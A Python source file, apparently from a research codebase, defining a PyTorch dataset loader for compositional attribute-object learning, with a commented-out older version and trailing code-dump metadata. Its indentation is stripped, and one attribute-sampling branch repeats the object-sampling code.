# # img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
# else:
# img_pos_obj_feats = torch.Tensor(10, len(img_pos_att[0]))
#
# img_pos_obj_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_obj_feats])
# img_pos_att_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_att_feats])
# img_pos_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_feats])
#
# all_neg_attrs = []
# all_neg_objs = []
#
# for curr in range(self.num_negs):
# neg_attr, neg_obj = self.sample_negative(attr, obj) # negative for triplet lose
# all_neg_attrs.append(neg_attr)
# all_neg_objs.append(neg_obj)
#
# neg_attr, neg_obj = torch.LongTensor(all_neg_attrs), torch.LongTensor(all_neg_objs)
#
# #note here
# if len(self.train_obj_affordance[obj])>1:
# inv_attr = self.sample_train_affordance(attr, obj) # attribute for inverse regularizer
# else:
# inv_attr = (all_neg_attrs[0])
#
# comm_attr = self.sample_affordance(inv_attr, obj) # attribute for commutative regularizer
#
#
# data += [neg_attr, neg_obj, inv_attr, comm_attr, img_pos_obj_feats, img_pos_att_feats, img_pos_feats]
#
# # Return image paths if requested as the last element of the list
# if self.return_images and self.phase != 'train':
# data.append(image)
#
# return data
#
# def __len__(self):
# '''
# Call for length
# '''
# return len(self.sample_indices)
# #external libs
import numpy as np
from tqdm import tqdm
from PIL import Image
from PIL import ImageFilter
import os
import random
from os.path import join as ospj
from glob import glob
#torch libs
from torch.utils.data import Dataset
import torch
import torchvision.transforms as transforms
#local libs
from utils.utils import get_norm_values, chunks
from models.image_extractor import get_image_extractor
from itertools import product
import math
device = 'cuda' if torch.cuda.is_available() else 'cpu'
class ImageLoader:
def __init__(self, root):
self.root_dir = root
def __call__(self, img):
img = Image.open(ospj(self.root_dir,img)).convert('RGB') #We don't want alpha
return img
def dataset_transform(phase, norm_family = 'imagenet'):
'''
Inputs
phase: String controlling which set of transforms to use
norm_family: String controlling which normaliztion values to use
Returns
transform: A list of pytorch transforms
'''
mean, std = get_norm_values(norm_family=norm_family)
if phase == 'train':
transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
elif phase == 'val' or phase == 'test':
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
elif phase == 'all':
transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
else:
raise ValueError('Invalid transform')
return transform
def filter_data(all_data, pairs_gt, topk = 5):
'''
Helper function to clean data
'''
valid_files = []
with open('/home/ubuntu/workspace/top'+str(topk)+'.txt') as f:
for line in f:
valid_files.append(line.strip())
data, pairs, attr, obj = [], [], [], []
for current in all_data:
if current[0] in valid_files:
data.append(current)
pairs.append((current[1],current[2]))
attr.append(current[1])
obj.append(current[2])
counter = 0
for current in pairs_gt:
if current in pairs:
counter+=1
print('Matches ', counter, ' out of ', len(pairs_gt))
print('Samples ', len(data), ' out of ', len(all_data))
return data, sorted(list(set(pairs))), sorted(list(set(attr))), sorted(list(set(obj)))
# Dataset class now
class GaussianBlur(object):
def __init__(self, sigma=[.1, 2.]):
self.sigma = sigma
def __call__(self, x):
sigma = random.uniform(self.sigma[0], self.sigma[1])
x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
return x
class CompositionDataset(Dataset):
'''
Inputs
root: String of base dir of dataset
phase: String train, val, test
split: String dataset split
subset: Boolean if true uses a subset of train at each epoch
num_negs: Int, numbers of negative pairs per batch
pair_dropout: Percentage of pairs to leave in current epoch
'''
def __init__(
self,
root,
phase,
split = 'compositional-split',
model = 'resnet18',
norm_family = 'imagenet',
subset = False,
num_negs = 1,
pair_dropout = 0.0,
update_features = False,
return_images = False,
train_only = False,
open_world=False
):
self.root = root
self.phase = phase
self.split = split
self.num_negs = num_negs
self.pair_dropout = pair_dropout
self.norm_family = norm_family
self.return_images = return_images
self.update_features = update_features
self.feat_dim = 512 if 'resnet18' in model else 2048 # todo, unify this with models
self.open_world = open_world
self.attrs, self.objs, self.pairs, self.train_pairs, \
self.val_pairs, self.test_pairs = self.parse_split()
self.train_data, self.val_data, self.test_data = self.get_split_info()
self.full_pairs = list(product(self.attrs,self.objs))
# Clean only was here
self.obj2idx = {obj: idx for idx, obj in enumerate(self.objs)}
self.attr2idx = {attr : idx for idx, attr in enumerate(self.attrs)}
if self.open_world:
self.pairs = self.full_pairs
self.all_pair2idx = {pair: idx for idx, pair in enumerate(self.pairs)}
if train_only and self.phase == 'train':
print('Using only train pairs')
self.pair2idx = {pair : idx for idx, pair in enumerate(self.train_pairs)}
else:
print('Using all pairs')
self.pair2idx = {pair : idx for idx, pair in enumerate(self.pairs)}
if self.phase == 'train':
self.data = self.train_data
elif self.phase == 'val':
self.data = self.val_data
elif self.phase == 'test':
self.data = self.test_data
elif self.phase == 'all':
print('Using all data')
self.data = self.train_data + self.val_data + self.test_data
else:
raise ValueError('Invalid training phase')
self.all_data = self.train_data + self.val_data + self.test_data
print('Dataset loaded')
print('Train pairs: {}, Validation pairs: {}, Test Pairs: {}'.format(
len(self.train_pairs), len(self.val_pairs), len(self.test_pairs)))
print('Train images: {}, Validation images: {}, Test images: {}'.format(
len(self.train_data), len(self.val_data), len(self.test_data)))
if subset:
ind = np.arange(len(self.data))
ind = ind[::len(ind) // 1000]
self.data = [self.data[i] for i in ind]
# Keeping a list of all pairs that occur with each object
self.obj_affordance = {}
self.train_obj_affordance = {}
for _obj in self.objs:
candidates = [attr for (_, attr, obj) in self.train_data+self.test_data if obj==_obj]
self.obj_affordance[_obj] = list(set(candidates))
candidates = [attr for (_, attr, obj) in self.train_data if obj==_obj]
self.train_obj_affordance[_obj] = list(set(candidates))
self.sample_indices = list(range(len(self.data)))
self.sample_pairs = self.train_pairs
# Load based on what to output
self.transform = dataset_transform(self.phase, self.norm_family)
self.loader = ImageLoader(ospj(self.root, 'images'))
if not self.update_features:
feat_file = ospj(root, model+'_featurers.t7')
print(f'Using {model} and feature file {feat_file}')
if not os.path.exists(feat_file):
with torch.no_grad():
self.generate_features(feat_file, model)
self.phase = phase
activation_data = torch.load(feat_file)
self.activations = dict(
zip(activation_data['files'], activation_data['features']))
self.feat_dim = activation_data['features'].size(1)
print('{} activations loaded'.format(len(self.activations)))
def parse_split(self):
'''
Helper function to read splits of object atrribute pair
Returns
all_attrs: List of all attributes
all_objs: List of all objects
all_pairs: List of all combination of attrs and objs
tr_pairs: List of train pairs of attrs and objs
vl_pairs: List of validation pairs of attrs and objs
ts_pairs: List of test pairs of attrs and objs
'''
def parse_pairs(pair_list):
'''
Helper function to parse each phase to object attrribute vectors
Inputs
pair_list: path to textfile
'''
with open(pair_list, 'r') as f:
pairs = f.read().strip().split('\n')
pairs = [line.split() for line in pairs]
pairs = list(map(tuple, pairs))
attrs, objs = zip(*pairs)
return attrs, objs, pairs
tr_attrs, tr_objs, tr_pairs = parse_pairs(
ospj(self.root, self.split, 'train_pairs.txt')
)
vl_attrs, vl_objs, vl_pairs = parse_pairs(
ospj(self.root, self.split, 'val_pairs.txt')
)
ts_attrs, ts_objs, ts_pairs = parse_pairs(
ospj(self.root, self.split, 'test_pairs.txt')
)
#now we compose all objs, attrs and pairs
all_attrs, all_objs = sorted(
list(set(tr_attrs + vl_attrs + ts_attrs))), sorted(
list(set(tr_objs + vl_objs + ts_objs)))
all_pairs = sorted(list(set(tr_pairs + vl_pairs + ts_pairs)))
return all_attrs, all_objs, all_pairs, tr_pairs, vl_pairs, ts_pairs
def get_split_info(self):
'''
Helper method to read image, attrs, objs samples
Returns
train_data, val_data, test_data: List of tuple of image, attrs, obj
'''
data = torch.load(ospj(self.root, 'metadata_{}.t7'.format(self.split)))
train_data, val_data, test_data = [], [], []
for instance in data:
image, attr, obj, settype = instance['image'], instance['attr'], \
instance['obj'], instance['set']
curr_data = [image, attr, obj]
if attr == 'NA' or (attr, obj) not in self.pairs or settype == 'NA':
# Skip incomplete pairs, unknown pairs and unknown set
continue
if settype == 'train':
train_data.append(curr_data)
elif settype == 'val':
val_data.append(curr_data)
else:
test_data.append(curr_data)
return train_data, val_data, test_data
def get_dict_data(self, data, pairs):
data_dict = {}
for current in pairs:
data_dict[current] = []
for current in data:
image, attr, obj = current
data_dict[(attr, obj)].append(image)
return data_dict
def reset_dropout(self):
'''
Helper function to sample new subset of data containing a subset of pairs of objs and attrs
'''
self.sample_indices = list(range(len(self.data)))
self.sample_pairs = self.train_pairs
# Using sampling from random instead of 2 step numpy
n_pairs = int((1 - self.pair_dropout) * len(self.train_pairs))
self.sample_pairs = random.sample(self.train_pairs, n_pairs)
print('Sampled new subset')
print('Using {} pairs out of {} pairs right now'.format(
n_pairs, len(self.train_pairs)))
self.sample_indices = [ i for i in range(len(self.data))
if (self.data[i][1], self.data[i][2]) in self.sample_pairs
]
print('Using {} images out of {} images right now'.format(
len(self.sample_indices), len(self.data)))
def sample_negative(self, attr, obj):
'''
Inputs
attr: String of valid attribute
obj: String of valid object
Returns
Tuple of a different attribute, object indexes
'''
new_attr, new_obj = self.sample_pairs[np.random.choice(
len(self.sample_pairs))]
while new_attr == attr and new_obj == obj:
new_attr, new_obj = self.sample_pairs[np.random.choice(
len(self.sample_pairs))]
return (self.attr2idx[new_attr], self.obj2idx[new_obj])
def sample_affordance(self, attr, obj):
'''
Inputs
attr: String of valid attribute
obj: String of valid object
Return
Idx of a different attribute for the same object
'''
new_attr = np.random.choice(self.obj_affordance[obj])
while new_attr == attr:
new_attr = np.random.choice(self.obj_affordance[obj])
return self.attr2idx[new_attr]
def sample_train_affordance(self, attr, obj):
'''
Inputs
attr: String of valid attribute
obj: String of valid object
Return
Idx of a different attribute for the same object from the training pairs
'''
new_attr = np.random.choice(self.train_obj_affordance[obj])
while new_attr == attr:
new_attr = np.random.choice(self.train_obj_affordance[obj])
return self.attr2idx[new_attr]
def generate_features(self, out_file, model):
'''
Inputs
out_file: Path to save features
model: String of extraction model
'''
# data = self.all_data
data = ospj(self.root,'images')
files_before = glob(ospj(data, '**', '*.jpg'), recursive=True)
files_all = []
for current in files_before:
parts = current.split('/')
if "cgqa" in self.root:
files_all.append(parts[-1])
else:
files_all.append(os.path.join(parts[-2],parts[-1]))
transform = dataset_transform('test', self.norm_family)
feat_extractor = get_image_extractor(arch = model).eval()
feat_extractor = feat_extractor.to(device)
image_feats = []
image_files = []
for chunk in tqdm(
chunks(files_all, 512), total=len(files_all) // 512, desc=f'Extracting features {model}'):
files = chunk
imgs = list(map(self.loader, files))
imgs = list(map(transform, imgs))
feats = feat_extractor(torch.stack(imgs, 0).to(device))
image_feats.append(feats.data.cpu())
image_files += files
image_feats = torch.cat(image_feats, 0)
print('features for %d images generated' % (len(image_files)))
torch.save({'features': image_feats, 'files': image_files}, out_file)
def __getitem__(self, index):
'''
Call for getting samples
'''
index = self.sample_indices[index]
image, attr, obj = self.data[index]
# Decide what to output
if not self.update_features:
img = self.activations[image]
else:
img = self.loader(image)
img = self.transform(img)
data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
# data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
if self.phase == 'train':
img_pos_obj = [_img for (_img, _, _obj) in self.train_data if _obj == obj]
img_pos_att = [_img for (_img, _att, _) in self.train_data if _att == attr]
for i in range(len(img_pos_obj)):
img_pos_obj[i] = self.activations[img_pos_obj[i]]
if len(img_pos_obj) > 10:
img_pos_obj_feats = random.sample(img_pos_obj, 10)
else:
if len(img_pos_obj) != 0:
img_pos_obj_feats = []
while len(img_pos_obj_feats) < 10:
for i in range(len(img_pos_obj)):
img_pos_obj_feats.append(img_pos_obj[i])
if len(img_pos_obj_feats) == 10:
break
# img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
else:
img_pos_obj_feats = torch.Tensor(10, len(img_pos_att[0]))
for i in range(len(img_pos_att)):
img_pos_att[i] = self.activations[img_pos_att[i]]
if len(img_pos_att) > 10:
img_pos_att_feats = random.sample(img_pos_att, 10)
else:
if len(img_pos_obj) != 0:
img_pos_obj_feats = []
while len(img_pos_obj_feats) < 10:
for i in range(len(img_pos_obj)):
img_pos_obj_feats.append(img_pos_obj[i])
if len(img_pos_obj_feats) == 10:
break
# img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
else:
img_pos_obj_feats = torch.Tensor(10, len(img_pos_att[0]))
img_pos_obj_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_obj_feats])
img_pos_att_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_att_feats])
all_neg_attrs = []
all_neg_objs = []
for curr in range(self.num_negs):
neg_attr, neg_obj = self.sample_negative(attr, obj) # negative for triplet lose
all_neg_attrs.append(neg_attr)
all_neg_objs.append(neg_obj)
neg_attr, neg_obj = torch.LongTensor(all_neg_attrs), torch.LongTensor(all_neg_objs)
#note here
if len(self.train_obj_affordance[obj])>1:
inv_attr = self.sample_train_affordance(attr, obj) # attribute for inverse regularizer
else:
inv_attr = (all_neg_attrs[0])
comm_attr = self.sample_affordance(inv_attr, obj) # attribute for commutative regularizer
data += [neg_attr, neg_obj, inv_attr, comm_attr, img_pos_obj_feats, img_pos_att_feats]
# Return image paths if requested as the last element of the list
if self.return_images and self.phase != 'train':
data.append(image)
return data
def __len__(self):
'''
Call for length
'''
return len(self.sample_indices)
# external libs
# import numpy as np
# from tqdm import tqdm
# from PIL import Image
# from PIL import ImageFilter
# import os
# import random
# from os.path import join as ospj
# from glob import glob
# # torch libs
# from torch.utils.data import Dataset
# import torch
# import torchvision.transforms as transforms
# # local libs
# from utils.utils import get_norm_values, chunks
# from models.image_extractor import get_image_extractor
# from itertools import product
# import math
#
# device = 'cuda' if torch.cuda.is_available() else 'cpu'
#
#
# class ImageLoader:
# def __init__(self, root):
# self.root_dir = root
#
# def __call__(self, img):
# img = Image.open(ospj(self.root_dir, img)).convert('RGB') # We don't want alpha
# return img
#
#
# def dataset_transform(phase, norm_family='imagenet'):
# '''
# Inputs
# phase: String controlling which set of transforms to use
# norm_family: String controlling which normaliztion values to use
#
# Returns
# transform: A list of pytorch transforms
# '''
# mean, std = get_norm_values(norm_family=norm_family)
#
# if phase == 'train':
# transform = transforms.Compose([
# transforms.RandomResizedCrop(224),
# transforms.RandomHorizontalFlip(),
# transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
#
# elif phase == 'val' or phase == 'test':
# transform = transforms.Compose([
# transforms.Resize(256),
# transforms.CenterCrop(224),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
# elif phase == 'all':
# transform = transforms.Compose([
# transforms.Resize(256),
# transforms.CenterCrop(224),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
# else:
# raise ValueError('Invalid transform')
#
# return transform
#
#
# def filter_data(all_data, pairs_gt, topk=5):
# '''
# Helper function to clean data
# '''
# valid_files = []
# with open('/home/ubuntu/workspace/top' + str(topk) + '.txt') as f:
# for line in f:
# valid_files.append(line.strip())
#
# data, pairs, attr, obj = [], [], [], []
# for current in all_data:
# if current[0] in valid_files:
# data.append(current)
# pairs.append((current[1], current[2]))
# attr.append(current[1])
# obj.append(current[2])
#
# counter = 0
# for current in pairs_gt:
# if current in pairs:
# counter += 1
# print('Matches ', counter, ' out of ', len(pairs_gt))
# print('Samples ', len(data), ' out of ', len(all_data))
# return data, sorted(list(set(pairs))), sorted(list(set(attr))), sorted(list(set(obj)))
#
#
# # Dataset class now
#
# class GaussianBlur(object):
# def __init__(self, sigma=[.1, 2.]):
# self.sigma = sigma
#
# def __call__(self, x):
# sigma = random.uniform(self.sigma[0], self.sigma[1])
# x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
# return x
#
#
# class CompositionDataset(Dataset):
# '''
# Inputs
# root: String of base dir of dataset
# phase: String train, val, test
# split: String dataset split
# subset: Boolean if true uses a subset of train at each epoch
# num_negs: Int, numbers of negative pairs per batch
# pair_dropout: Percentage of pairs to leave in current epoch
# '''
#
# def __init__(
# self,
# root,
# phase,
# split='compositional-split',
# model='resnet18',
# norm_family='imagenet',
# subset=False,
# num_negs=1,
# pair_dropout=0.0,
# update_features=False,
# return_images=False,
# train_only=False,
# open_world=False
# ):
# self.root = root
# self.phase = phase
# self.split = split
# self.num_negs = num_negs
# self.pair_dropout = pair_dropout
# self.norm_family = norm_family
# self.return_images = return_images
# self.update_features = update_features
# self.feat_dim = 512 if 'resnet18' in model else 2048 # todo, unify this with models
# self.open_world = open_world
#
# self.attrs, self.objs, self.pairs, self.train_pairs, \
# self.val_pairs, self.test_pairs = self.parse_split()
# self.train_data, self.val_data, self.test_data = self.get_split_info()
# self.full_pairs = list(product(self.attrs, self.objs))
#
# # Clean only was here
# self.obj2idx = {obj: idx for idx, obj in enumerate(self.objs)}
# self.attr2idx = {attr: idx for idx, attr in enumerate(self.attrs)}
# if self.open_world:
# self.pairs = self.full_pairs
#
# self.all_pair2idx = {pair: idx for idx, pair in enumerate(self.pairs)}
#
# if train_only and self.phase == 'train':
# print('Using only train pairs')
# self.pair2idx = {pair: idx for idx, pair in enumerate(self.train_pairs)}
# else:
# print('Using all pairs')
# self.pair2idx = {pair: idx for idx, pair in enumerate(self.pairs)}
#
# if self.phase == 'train':
# self.data = self.train_data
# elif self.phase == 'val':
# self.data = self.val_data
# elif self.phase == 'test':
# self.data = self.test_data
# elif self.phase == 'all':
# print('Using all data')
# self.data = self.train_data + self.val_data + self.test_data
# else:
# raise ValueError('Invalid training phase')
#
# self.all_data = self.train_data + self.val_data + self.test_data
# print('Dataset loaded')
# print('Train pairs: {}, Validation pairs: {}, Test Pairs: {}'.format(
# len(self.train_pairs), len(self.val_pairs), len(self.test_pairs)))
# print('Train images: {}, Validation images: {}, Test images: {}'.format(
# len(self.train_data), len(self.val_data), len(self.test_data)))
#
# if subset:
# ind = np.arange(len(self.data))
# ind = ind[::len(ind) // 1000]
# self.data = [self.data[i] for i in ind]
#
# # Keeping a list of all pairs that occur with each object
# self.obj_affordance = {}
# self.train_obj_affordance = {}
# for _obj in self.objs:
# candidates = [attr for (_, attr, obj) in self.train_data + self.test_data if obj == _obj]
# self.obj_affordance[_obj] = list(set(candidates))
#
# candidates = [attr for (_, attr, obj) in self.train_data if obj == _obj]
# self.train_obj_affordance[_obj] = list(set(candidates))
#
# self.sample_indices = list(range(len(self.data)))
# self.sample_pairs = self.train_pairs
#
# # Load based on what to output
# self.transform = dataset_transform(self.phase, self.norm_family)
# self.loader = ImageLoader(ospj(self.root, 'images'))
# if not self.update_features:
# feat_file = ospj(root, model + '_featurers.t7')
# print(f'Using {model} and feature file {feat_file}')
# if not os.path.exists(feat_file):
# with torch.no_grad():
# self.generate_features(feat_file, model)
# self.phase = phase
# activation_data = torch.load(feat_file)
# self.activations = dict(
# zip(activation_data['files'], activation_data['features']))
# self.feat_dim = activation_data['features'].size(1)
# print('{} activations loaded'.format(len(self.activations)))
#
# def parse_split(self):
# '''
# Helper function to read splits of object atrribute pair
# Returns
# all_attrs: List of all attributes
# all_objs: List of all objects
# all_pairs: List of all combination of attrs and objs
# tr_pairs: List of train pairs of attrs and objs
# vl_pairs: List of validation pairs of attrs and objs
# ts_pairs: List of test pairs of attrs and objs
# '''
#
# def parse_pairs(pair_list):
# '''
# Helper function to parse each phase to object attrribute vectors
# Inputs
# pair_list: path to textfile
# '''
# with open(pair_list, 'r') as f:
# pairs = f.read().strip().split('\n')
# pairs = [line.split() for line in pairs]
# pairs = list(map(tuple, pairs))
#
# attrs, objs = zip(*pairs)
# return attrs, objs, pairs
#
# tr_attrs, tr_objs, tr_pairs = parse_pairs(
# ospj(self.root, self.split, 'train_pairs.txt')
# )
# vl_attrs, vl_objs, vl_pairs = parse_pairs(
# ospj(self.root, self.split, 'val_pairs.txt')
# )
# ts_attrs, ts_objs, ts_pairs = parse_pairs(
# ospj(self.root, self.split, 'test_pairs.txt')
# )
#
# # now we compose all objs, attrs and pairs
# all_attrs, all_objs = sorted(
# list(set(tr_attrs + vl_attrs + ts_attrs))), sorted(
# list(set(tr_objs + vl_objs + ts_objs)))
# all_pairs = sorted(list(set(tr_pairs + vl_pairs + ts_pairs)))
#
# return all_attrs, all_objs, all_pairs, tr_pairs, vl_pairs, ts_pairs
#
# def get_split_info(self):
# '''
# Helper method to read image, attrs, objs samples
#
# Returns
# train_data, val_data, test_data: List of tuple of image, attrs, obj
# '''
# data = torch.load(ospj(self.root, 'metadata_{}.t7'.format(self.split)))
#
# train_data, val_data, test_data = [], [], []
#
# for instance in data:
# image, attr, obj, settype = instance['image'], instance['attr'], \
# instance['obj'], instance['set']
# curr_data = [image, attr, obj]
#
# if attr == 'NA' or (attr, obj) not in self.pairs or settype == 'NA':
# # Skip incomplete pairs, unknown pairs and unknown set
# continue
#
# if settype == 'train':
# train_data.append(curr_data)
# elif settype == 'val':
# val_data.append(curr_data)
# else:
# test_data.append(curr_data)
#
# return train_data, val_data, test_data
#
# def get_dict_data(self, data, pairs):
# data_dict = {}
# for current in pairs:
# data_dict[current] = []
#
# for current in data:
# image, attr, obj = current
# data_dict[(attr, obj)].append(image)
#
# return data_dict
#
# def reset_dropout(self):
# '''
# Helper function to sample new subset of data containing a subset of pairs of objs and attrs
# '''
# self.sample_indices = list(range(len(self.data)))
# self.sample_pairs = self.train_pairs
#
# # Using sampling from random instead of 2 step numpy
# n_pairs = int((1 - self.pair_dropout) * len(self.train_pairs))
#
# self.sample_pairs = random.sample(self.train_pairs, n_pairs)
# print('Sampled new subset')
# print('Using {} pairs out of {} pairs right now'.format(
# n_pairs, len(self.train_pairs)))
#
# self.sample_indices = [i for i in range(len(self.data))
# if (self.data[i][1], self.data[i][2]) in self.sample_pairs
# ]
# print('Using {} images out of {} images right now'.format(
# len(self.sample_indices), len(self.data)))
#
# def sample_negative(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Returns
# Tuple of a different attribute, object indexes
# '''
# new_attr, new_obj = self.sample_pairs[np.random.choice(
# len(self.sample_pairs))]
#
# while new_attr == attr and new_obj == obj:
# new_attr, new_obj = self.sample_pairs[np.random.choice(
# len(self.sample_pairs))]
#
# return (self.attr2idx[new_attr], self.obj2idx[new_obj])
#
# def sample_affordance(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Return
# Idx of a different attribute for the same object
# '''
# new_attr = np.random.choice(self.obj_affordance[obj])
#
# while new_attr == attr:
# new_attr = np.random.choice(self.obj_affordance[obj])
#
# return self.attr2idx[new_attr]
#
# def sample_train_affordance(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Return
# Idx of a different attribute for the same object from the training pairs
# '''
# new_attr = np.random.choice(self.train_obj_affordance[obj])
#
# while new_attr == attr:
# new_attr = np.random.choice(self.train_obj_affordance[obj])
#
# return self.attr2idx[new_attr]
#
# def generate_features(self, out_file, model):
# '''
# Inputs
# out_file: Path to save features
# model: String of extraction model
# '''
# # data = self.all_data
# data = ospj(self.root, 'images')
# files_before = glob(ospj(data, '**', '*.jpg'), recursive=True)
# files_all = []
# for current in files_before:
# parts = current.split('/')
# if "cgqa" in self.root:
# files_all.append(parts[-1])
# else:
# files_all.append(os.path.join(parts[-2], parts[-1]))
# transform = dataset_transform('test', self.norm_family)
# feat_extractor = get_image_extractor(arch=model).eval()
# feat_extractor = feat_extractor.to(device)
#
# image_feats = []
# image_files = []
# for chunk in tqdm(
# chunks(files_all, 512), total=len(files_all) // 512, desc=f'Extracting features {model}'):
# files = chunk
# imgs = list(map(self.loader, files))
# imgs = list(map(transform, imgs))
# feats = feat_extractor(torch.stack(imgs, 0).to(device))
# image_feats.append(feats.data.cpu())
# image_files += files
# image_feats = torch.cat(image_feats, 0)
# print('features for %d images generated' % (len(image_files)))
#
# torch.save({'features': image_feats, 'files': image_files}, out_file)
#
# def __getitem__(self, index):
# '''
# Call for getting samples
# '''
# index = self.sample_indices[index]
#
# image, attr, obj = self.data[index]
#
# # Decide what to output
# if not self.update_features:
# img = self.activations[image]
# else:
# img = self.loader(image)
# img = self.transform(img)
#
# data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
# # data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
#
# if self.phase == 'train':
#
# img_pos_obj = [_img for (_img, _att, _obj) in self.train_data if _obj == obj and _att != attr]
# img_pos_att = [_img for (_img, _att, _obj) in self.train_data if _att == attr and _obj != obj]
#
# for i in range(len(img_pos_obj)):
# img_pos_obj[i] = self.activations[img_pos_obj[i]]
# if len(img_pos_obj) > 10:
# img_pos_obj_feats = random.sample(img_pos_obj, 10)
# else:
# img_pos_obj_feats = []
# while len(img_pos_obj_feats) < 10:
# if len(img_pos_obj) == 0:
# img_pos_obj = []
# img_pos_obj.append(img)
# for i in range(len(img_pos_obj)):
# img_pos_obj_feats.append(img_pos_obj[i])
# if len(img_pos_obj_feats) == 10:
# break
# # img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
#
# for i in range(len(img_pos_att)):
# img_pos_att[i] = self.activations[img_pos_att[i]]
# if len(img_pos_att) > 10:
# img_pos_att_feats = random.sample(img_pos_att, 10)
# else:
# img_pos_att_feats = []
# while len(img_pos_att_feats) < 10:
# if len(img_pos_att) == 0:
# img_pos_att = []
# img_pos_att.append(img)
# for i in range(len(img_pos_att)):
# img_pos_att_feats.append(img_pos_att[i])
# if len(img_pos_att_feats) == 10:
# break
# # img_pos_att_feats = img_pos_att.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
#
# img_pos_obj_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_obj_feats])
# img_pos_att_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_att_feats])
#
# # img_neg = [_img for (_img, _att, _obj) in self.train_data if _att != attr or _obj != obj]
# # for i in range(len(img_neg)):
# # img_neg[i] = self.activations[img_neg[i]]
# # if len(img_neg) > 512:
# # img_neg_feats = random.sample(img_neg, 512)
# # else:
# # if len(img_neg) != 0:
# # img_neg_feats = []
# # while len(img_neg_feats) < 512:
# # for i in range(len(img_neg)):
# # img_neg_feats.append(img_neg[i])
# # if len(img_neg_feats) == 512:
# # break
# # else:
# # img_neg_feats = torch.Tensor(512, len(img_neg[0]))
# #
# # img_neg_feats = torch.tensor([item.cpu().detach().numpy() for item in img_neg_feats])
#
# all_neg_attrs = []
# all_neg_objs = []
#
# for curr in range(self.num_negs):
# neg_attr, neg_obj = self.sample_negative(attr, obj) # negative for triplet lose
# all_neg_attrs.append(neg_attr)
# all_neg_objs.append(neg_obj)
#
# neg_attr, neg_obj = torch.LongTensor(all_neg_attrs), torch.LongTensor(all_neg_objs)
#
# # note here
# if len(self.train_obj_affordance[obj]) > 1:
# inv_attr = self.sample_train_affordance(attr, obj) # attribute for inverse regularizer
# else:
# inv_attr = (all_neg_attrs[0])
#
# comm_attr = self.sample_affordance(inv_attr, obj) # attribute for commutative regularizer
#
# data += [neg_attr, neg_obj, inv_attr, comm_attr, img_pos_obj_feats, img_pos_att_feats]
# # data += [neg_attr, neg_obj, inv_attr, comm_attr, img_pos_obj_feats, img_pos_att_feats, img_neg_feats]
#
# # Return image paths if requested as the last element of the list
# if self.return_images and self.phase != 'train':
# data.append(image)
#
# return data
#
# def __len__(self):
# '''
# Call for length
# '''
# return len(self.sample_indices)
| 37.735738 | 117 | 0.561107 | 7,038 | 57,547 | 4.389031 | 0.044757 | 0.028553 | 0.025639 | 0.019035 | 0.994367 | 0.990515 | 0.988087 | 0.984623 | 0.984234 | 0.979767 | 0 | 0.009397 | 0.321355 | 57,547 | 1,524 | 118 | 37.760499 | 0.781559 | 0.694545 | 0 | 0.204969 | 0 | 0 | 0.047993 | 0.001633 | 0 | 0 | 0 | 0.001969 | 0 | 1 | 0.055901 | false | 0 | 0.046584 | 0 | 0.152174 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a2a0bab466ef19b487aa54f070b631438b2c3d1b | 38 | py | Python | stweet/parse/__init__.py | enginbozaba/stweet-twitter-api | 060250e00a01ae53c2ca12954719b5efc918e132 | [
"MIT"
] | null | null | null | stweet/parse/__init__.py | enginbozaba/stweet-twitter-api | 060250e00a01ae53c2ca12954719b5efc918e132 | [
"MIT"
] | null | null | null | stweet/parse/__init__.py | enginbozaba/stweet-twitter-api | 060250e00a01ae53c2ca12954719b5efc918e132 | [
"MIT"
] | null | null | null | from .tweet_parser import TweetParser
